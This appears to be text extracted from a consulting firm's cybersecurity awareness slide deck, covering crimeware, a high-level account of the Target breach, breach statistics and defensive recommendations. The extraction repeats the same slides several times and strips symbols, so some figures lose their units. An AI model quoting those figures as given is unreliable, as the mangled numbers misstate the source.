bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CYBER-ESPIONAGE
bull External Parties (possibly state-
affiliated or organized crime)
infiltrating an organizationrsquos systems
bull Attacks commonly begin through
phishing andor exploiting
backdoors in software (browsers or
even websites)
bull Over 90 of breaches target trade
secrets for exfiltration
31
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
CRIMEWARE
bull Crimeware contains any malware or
other incident that focuses directly
on financial opportunity
bull Ransomware keyloggers and use
of backdoors most common
occurrence of Crimeware
bull Crimeware is typically introduced
through the following- Email Attachment
- Cross-site scripting from visited website
- Email Link
32
Source Verizon Data Breach Investigations Report 2016
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
KEY CYBER ATTACKS IN THE NEWS
bull Target Data Breach ndash 70 Million PII Records of Users
and 40 Million Credit Cards Stolen
bull Sony Attack ndash Malware attack that erased over half of
the companyrsquos servers and PCrsquos and released 4
unreleased movies and over 45000 social security
numbers
bull Yahoo Data Breach (20132014) ndash August breach that
exposed PII of 1 billion users 2014 data breach of 500
million users Additional data loss in 2016
bull Prepaid CardATM Scheme (2013) ndash $45 Million Stolen
(worldwide)
bull Bank of Bangladesh (February 2016) ndash $81 Million
Stolen
33
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
34
bull Cyber attackers first attacked third party vender (The HVAC Vendor) through use of Malware introduced via phishing campaign
bull Used HVAC Vendor stolen credentials to gain access to third party website used for submitting electronic invoices
bull Injected code into a vulnerability of the electronic submission process to gain further access to Target internal network
bull Recon-ed the environment and obtained domain administrator access
bull Attackers then worked their way through various servers by using a scanner to detect which other servers they could gain access to from their current location Worked around firewalls and other defenses
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
COMPLEXITY BEHIND THE TARGET ATTACK
35
bull Gained access to server than contained SQL database and were able to download 70 million PII records of customers
bull Attackers then gained access to POS environment (should have been walled off)
bull Attackers then went on the darknet and inquired to find someone with knowledge of the POS system and how to inject code into the POS application
bull Attackers were able to install malware on certain POS servers that scanned memory and saved off credit card information
bull Attackers then copied credit card files to another server that had remote FTP ability and sent files to themselves
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
CYBERSECURITY RISK ASSESSMENT
Key to an effective cybersecurity program is to understand the Companyrsquos information
assets
40
bull What Value Do the Assets Havebull Credit Card Databull Employee or Customer Recordsbull Bank Accountsbull Intellectual Propertybull Trade Secretsbull Insider Knowledgebull Who Would Want the Databull Data Location
copyStinnett amp Associates LLC
BASELINE GAP ANALYSIS
41
bull Perform walkthroughs with information technology department to understand cybersecurity controls in place
bull Evaluate control design as it relates to commonly accepted framework(s)
bull Identify control gaps and create a baseline for cybersecurity maturity in the organization
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
42
Patch Management ndash A Patch Management process is a companyrsquos strategy around ensuring a companyrsquos IT devices
are properly updated (patched) to reflect the latest software update or release from the vendor Most companies fail to
implement sound patch management processes and procedures which includes
bull 99 of exploited vulnerabilities were comprised more than a year after the patch was published
bull Companies do not know all of the Information devices in their network and therefore are unable
to adequately assess their patch management process
User and Administrator level Access ndash Companies fail to adequately assess User access levels to ensure that the
principle of Least Privilege is applied as much as possible Within IT department the failure of Least Privilege can
result in multiple individuals and IDrsquos with access andor knowledge of higher level functions within the environment
User Cybersecurity Training and Awareness ndash Companies often fail to implement basic end user training around
cybersecurity Often times the uneducated or untrained end user is the Cyber attackers first entry point into the
company
copyStinnett amp Associates LLC
CYBERSECURITY FAILURES AND FIXES
43
FIXESbull Obtain at least a basic understanding of your critical information assets where they are
stored and how they are protected
bull Perform an Inventory of IT devices and assess each devices risk relating to patches
bull Focus on higher risk areas such as internet facing devices and software with known vulnerabilities (Adobe Java Browsers Operating Systems)
bull Perform an inventory of all User and Admin IDs Understand the access each ID has in your environment and why that access level is necessary Assess whether password levels and parameters are adequate (password length characters and change interval)
bull Implement a continual end user training program
bull Ensure backups and recovery plans work as intended and are properly segregated
copyStinnett amp Associates LLC
QUESTIONS
44
wwwSTINNETT-ASSOCIATEScom | 8888081795
Stinnett amp Associates8811 S Yale Ave Suite 300
Tulsa OK 74137
Main Number 9187283300
ContactUsStinnett-Associatescom
copyStinnett amp Associates LLC
RANSOMWARE ndash ANATOMY OF AN ATTACK
36
copyStinnett amp Associates LLC
BARRIERS TO EFFECTIVE CYBERSECURITY
Many companies do not know where to start with cybersecurity how to evaluate what is
enough or how to recover when their best efforts still result in a cyber breach Main
reasons for companies struggles are
37
bull Expansion of the attack surface
bull Continued innovations in technology
bull Lack of understanding of companyrsquos information assets and the assetrsquos value
bull Failure to properly understand threats and risks
bull Failure to implement core security protocols and procedures
bull Lack of skilled resources (people and time)
bull Lack of funds
copyStinnett amp Associates LLC
CYBERSECURITY DEFENSE IN-DEPTH
38
PEOPLE
TECHNOLOGYPROCESSES
THE PEOPLE CHALLENGEHumans remain one of the weakest links in security chain Ensure you have a strong security awareness training program
THE TECHNOLOGY CHALLENGEThe increasing sophistication and rate of attacks means that constant upkeep and tracking of technology changes is essential
THE PROCESS CHALLENGEEnsure best practice processes and associated management frameworks are in place Regular audits and reviews are important
copyStinnett amp Associates LLC
IMPLEMENTING A CYBERSECURITY PROGRAM
39
bull Understand the organizational risk
and where high risk assets exist
bull Risk assessments should be
performed annually or when
significant changes to the
environment occur
bull Stinnett uses Microsoft STRIDE
Threat Modeling to semi-qualitatively
measure cybersecurity risks to
identify estimate and prioritize
information security risks
Identification of Assets
Asset Locations
Classification of Assets
Threat Modeling
Calculated Risk Results
copyStinnett amp Associates LLC
